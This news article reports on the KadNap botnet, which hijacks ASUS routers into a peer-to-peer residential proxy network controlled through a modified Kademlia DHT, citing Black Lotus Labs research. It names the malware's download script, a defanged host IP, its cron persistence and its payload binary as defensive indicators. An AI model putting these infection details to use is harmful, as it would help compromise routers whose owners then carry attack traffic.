A newly identified botnet malware, known as KadNap, is primarily exploiting ASUS routers and other edge networking devices to create a network of proxies for malicious activities. Since its emergence in August 2025, KadNap has infected approximately 14,000 devices, forming a peer-to-peer network that communicates with its command-and-control (C2) infrastructure using a customized version of the Kadmelia Distributed Hash Table (DHT) protocol.
The decentralized nature of this network presents significant challenges for cybersecurity professionals attempting to identify and disrupt the C2 servers. According to researchers from Black Lotus Labs, the threat research division of Lumen Technologies, nearly half of the KadNap network is linked to C2 infrastructure specifically designed for ASUS-based bots. The remaining devices connect to two other separate control servers, complicating mitigation efforts.
Most of the infected devices are located in the United States, which accounts for 60% of the total infections. Following the US, notable percentages of infected devices are found in Taiwan, Hong Kong, and Russia. The infection process begins when a malicious script, identified as aic.sh, is downloaded from the IP address 212.104.141[.]140. This script establishes persistence on the device through a cron job that executes every 55 minutes. The malware’s payload is an ELF binary named kad, which installs the KadNap client.
Once operational, KadNap identifies the host’s external IP address and queries multiple Network Time Protocol (NTP) servers to gather the current time and system uptime. To further enhance its resilience against takedown efforts, the malware utilizes a modified Kademlia-based DHT protocol to locate botnet nodes and the C2 infrastructure. As researchers explain, “KadNap employs a custom version of the Kademlia Distributed Hash Table (DHT) protocol, which is used to conceal the IP address of their infrastructure within a peer-to-peer system to evade traditional network monitoring.” The infected devices rely on this DHT protocol to connect with C2 servers, making it difficult for defenders to add these servers to threat lists.
Despite its decentralized design, the researchers noted that KadNap’s implementation of Kademlia is partially compromised due to consistent connections to two specific nodes before reaching the C2 servers. This centralization diminishes the potential decentralization effects that the protocol could otherwise provide, thereby enabling the identification of the control infrastructure.
The KadNap botnet is thought to be associated with the Doppelganger proxy service, which is believed to be a rebranding of the previously known Faceless service. This service has a history of connections to the TheMoon malware botnet, which also targeted ASUS routers. Doppelganger markets access to compromised devices as residential proxies, which can be exploited to funnel harmful traffic, create layers of pseudonymization, and bypass blocklists. These services are often used to initiate distributed denial-of-service (DDoS) attacks, credential stuffing, and brute-force assaults, ultimately leading back to KadNap’s victims.
In response to the growing threat posed by the KadNap botnet, Lumen Technologies has taken proactive measures. As of the publication of this article, the company has stated that it has “blocked all network traffic to or from the control infrastructure.” This disruption is limited to Lumen’s network, but the company plans to release a list of indicators of compromise to assist other organizations in countering the botnet on their systems.
As cyber threats continue to evolve, the emergence of the KadNap botnet highlights the importance of vigilance and collaboration in the cybersecurity community to safeguard against increasingly sophisticated attacks.
